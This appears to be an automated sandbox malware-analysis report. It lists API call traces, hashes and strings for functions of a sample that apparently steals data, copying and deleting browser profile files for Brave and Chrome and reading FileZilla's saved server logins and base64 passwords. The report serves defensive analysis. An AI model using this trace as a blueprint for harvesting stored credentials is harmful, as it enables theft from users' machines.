                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E29B
                              • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00E3E2A7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E2CF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E30F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E349
                              • DeleteFileA.KERNEL32(?), ref: 00E3E381
                              • StrCmpCA.SHLWAPI(?,00D2E078), ref: 00E3E3AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E3F4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E41C
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E445
                              • StrCmpCA.SHLWAPI(?,00D28BD8), ref: 00E3E468
                              • StrCmpCA.SHLWAPI(?,00D28AD8), ref: 00E3E47D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E4D9
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E3E4E0
                              • StrCmpCA.SHLWAPI(?,00D2E090), ref: 00E3E58E
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3E5C4
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00E3E639
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E678
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E6A1
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E6C7
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E70E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E737
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E75C
                              • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00E3E776
                              • DeleteFileA.KERNEL32(?), ref: 00E3E7D2
                              • StrCmpCA.SHLWAPI(?,00D28C78), ref: 00E3E7FC
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E88C
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E8B5
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E8EE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E916
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E952
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 2635522530-726946144
                              • Opcode ID: 2cecdb1cb24f88265505401789b08bf015b35d68641fd011d89a75e4b5110125
                              • Instruction ID: f07576b0854c199164eb1ca6aae88e11b99c93121e43ee1102e42a011c8fa148
                              • Opcode Fuzzy Hash: 2cecdb1cb24f88265505401789b08bf015b35d68641fd011d89a75e4b5110125
                              • Instruction Fuzzy Hash: 3F927C71A103059FCB20EF68D88DAAE7BF9AF44308F146528F985B7255DB35EC45CB90
                              Function 00E418A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E418D2
                              • lstrlen.KERNEL32(\*.*), ref: 00E418DD
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E418FF
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 00E4190B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41932
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E41947
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E41967
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E41981
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E419BF
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E419F2
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E41A1A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E41A25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41A4C
                              • lstrlen.KERNEL32(00E61794), ref: 00E41A5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41A80
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41A8C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41AB4
                              • lstrlen.KERNEL32(?), ref: 00E41AC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41AE5
                              • lstrcat.KERNEL32(00000000,?), ref: 00E41AF3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41B19
                              • lstrlen.KERNEL32(00D28BB8), ref: 00E41B2F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41B59
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E41B64
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41B8F
                              • lstrlen.KERNEL32(00E61794), ref: 00E41BA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41BC3
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41BCF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41BF8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41C25
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E41C30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41C57
                              • lstrlen.KERNEL32(00E61794), ref: 00E41C69
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41C8B
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41C97
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41CC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41CEF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E41CFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41D21
                              • lstrlen.KERNEL32(00E61794), ref: 00E41D33
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41D55
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41D61
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41D8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41DB9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E41DC4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41DED
                              • lstrlen.KERNEL32(00E61794), ref: 00E41E19
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41E36
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41E42
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41E68
                              • lstrlen.KERNEL32(00D2DF28), ref: 00E41E7E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41EB2
                              • lstrlen.KERNEL32(00E61794), ref: 00E41EC6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41EE3
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41EEF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41F15
                              • lstrlen.KERNEL32(00D2E3B8), ref: 00E41F2B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41F5F
                              • lstrlen.KERNEL32(00E61794), ref: 00E41F73
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41F90
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41F9C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41FC2
                              • lstrlen.KERNEL32(00D1A4B0), ref: 00E41FD8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42000
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E4200B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42036
                              • lstrlen.KERNEL32(00E61794), ref: 00E42048
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42067
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E42073
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42098
                              • lstrlen.KERNEL32(?), ref: 00E420AC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E420D0
                              • lstrcat.KERNEL32(00000000,?), ref: 00E420DE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42103
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4213F
                              • lstrlen.KERNEL32(00D2DF58), ref: 00E4214E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42176
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E42181
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                              • String ID: \*.*
                              • API String ID: 712834838-1173974218
                              • Opcode ID: fbf8862cd6ecb45400ba403c3b33a4027c75f919804d759db6041e4d4ef1a90a
                              • Instruction ID: dec65cfae88f4953eeb8e4e3ca5a4df3d17e1498a8bc3add660c5ad98968ef39
                              • Opcode Fuzzy Hash: fbf8862cd6ecb45400ba403c3b33a4027c75f919804d759db6041e4d4ef1a90a
                              • Instruction Fuzzy Hash: 04629F309117169FCB22AF64EC4CAAE7BF9AF40708F046068FA85B7255DB35DD45CBA0
                              Function 00E43910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00E4392C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00E43943
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E4396C
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E43986
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E439BF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E439E7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E439F2
                              • lstrlen.KERNEL32(00E61794), ref: 00E439FD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43A1A
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E43A26
                              • lstrlen.KERNEL32(?), ref: 00E43A33
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43A53
                              • lstrcat.KERNEL32(00000000,?), ref: 00E43A61
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43A8A
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E43ACE
                              • lstrlen.KERNEL32(?), ref: 00E43AD8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43B05
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E43B10
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43B36
                              • lstrlen.KERNEL32(00E61794), ref: 00E43B48
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43B6A
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E43B76
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43B9E
                              • lstrlen.KERNEL32(?), ref: 00E43BB2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43BD2
                              • lstrcat.KERNEL32(00000000,?), ref: 00E43BE0
                              • lstrlen.KERNEL32(00D28C08), ref: 00E43C0B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43C31
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E43C3C
                              • lstrlen.KERNEL32(00D28BB8), ref: 00E43C5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43C84
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E43C8F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43CB7
                              • lstrlen.KERNEL32(00E61794), ref: 00E43CC9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43CE8
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E43CF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43D1A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E43D47
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E43D52
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43D79
                              • lstrlen.KERNEL32(00E61794), ref: 00E43D8B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43DAD
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E43DB9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43DE2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43E11
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E43E1C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43E43
                              • lstrlen.KERNEL32(00E61794), ref: 00E43E55
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43E77
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E43E83
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43EAC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43EDB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E43EE6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43F0D
                              • lstrlen.KERNEL32(00E61794), ref: 00E43F1F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43F41
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E43F4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43F75
                              • lstrlen.KERNEL32(?), ref: 00E43F89
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43FA9
                              • lstrcat.KERNEL32(00000000,?), ref: 00E43FB7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E43FE0
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4401F
                              • lstrlen.KERNEL32(00D2DF58), ref: 00E4402E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E44056
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E44061
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4408A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E440CE
                              • lstrcat.KERNEL32(00000000), ref: 00E440DB
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E442D9
                              • FindClose.KERNEL32(00000000), ref: 00E442E8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 1006159827-1013718255
                              • Opcode ID: 9ae5a79b07ab7600c65316890eca7dc5545b98e80d7ac59e8451902baff8e655
                              • Instruction ID: ab0ad5362daf305ef5fd0c756a90c216f38d0d9a6afeb8b392090c12109fb2fc
                              • Opcode Fuzzy Hash: 9ae5a79b07ab7600c65316890eca7dc5545b98e80d7ac59e8451902baff8e655
                              • Instruction Fuzzy Hash: 2962A131A117169FCB21AF74E84DAAEBBF9AF40308F046128F985B7255DB35DE05CB90
                              Function 00E46960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46995
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00E469C8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46A02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46A29
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E46A34
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46A5D
                              • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00E46A77
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46A99
                              • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00E46AA5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46AD0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E46B00
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00E46B35
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46B9D
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E46BCD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 313953988-555421843
                              • Opcode ID: 390493ed52a3a9e19d3dd15beedf787cb27b737a63e2cfb5c0ce127066da7f12
                              • Instruction ID: 13a20742e75efb351a977e0b78825a3f2a9df3df445318e0aa092601d12f2ce1
                              • Opcode Fuzzy Hash: 390493ed52a3a9e19d3dd15beedf787cb27b737a63e2cfb5c0ce127066da7f12
                              • Instruction Fuzzy Hash: EA42D170A01305AFDB21AFB4EC49BAE7BB9AF45708F146418FA81F7241DB35D901CBA1
                              Function 00E3DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DBC1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DBE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DBEF
                              • lstrlen.KERNEL32(00E64CA8), ref: 00E3DBFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DC17
                              • lstrcat.KERNEL32(00000000,00E64CA8), ref: 00E3DC23
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DC4C
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DC8F
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DCBF
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E3DCD0
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E3DCF0
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E3DD0A
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E3DD1D
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DD47
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DD70
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DD7B
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DD86
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DDA3
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DDAF
                              • lstrlen.KERNEL32(?), ref: 00E3DDBC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DDDF
                              • lstrcat.KERNEL32(00000000,?), ref: 00E3DDED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DE19
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DE3D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3DE6F
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DE7B
                              • lstrlen.KERNEL32(00D28AD8), ref: 00E3DE8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DEB0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DEBB
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DEC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3DEE6
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DEF2
                              • lstrlen.KERNEL32(00D28BD8), ref: 00E3DF01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DF27
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DF32
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DF5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DFA5
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DFB1
                              • lstrlen.KERNEL32(00D28AD8), ref: 00E3DFC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DFE9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DFF4
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DFFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E022
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3E02E
                              • lstrlen.KERNEL32(00D28BD8), ref: 00E3E03D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E063
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3E06E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E09A
                              • StrCmpCA.SHLWAPI(?,Brave), ref: 00E3E0CD
                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 00E3E0E7
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3E11F
                              • lstrlen.KERNEL32(00D2DF58), ref: 00E3E12E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E155
                              • lstrcat.KERNEL32(00000000,?), ref: 00E3E15D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E19F
                              • lstrcat.KERNEL32(00000000), ref: 00E3E1A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E1D0
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00E3E1F9
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3E22F
                              • lstrlen.KERNEL32(00D28C08), ref: 00E3E23D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E261
                              • lstrcat.KERNEL32(00000000,00D28C08), ref: 00E3E269
                              • FindNextFileA.KERNEL32(00000000,?), ref: 00E3E988
                              • FindClose.KERNEL32(00000000), ref: 00E3E997
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
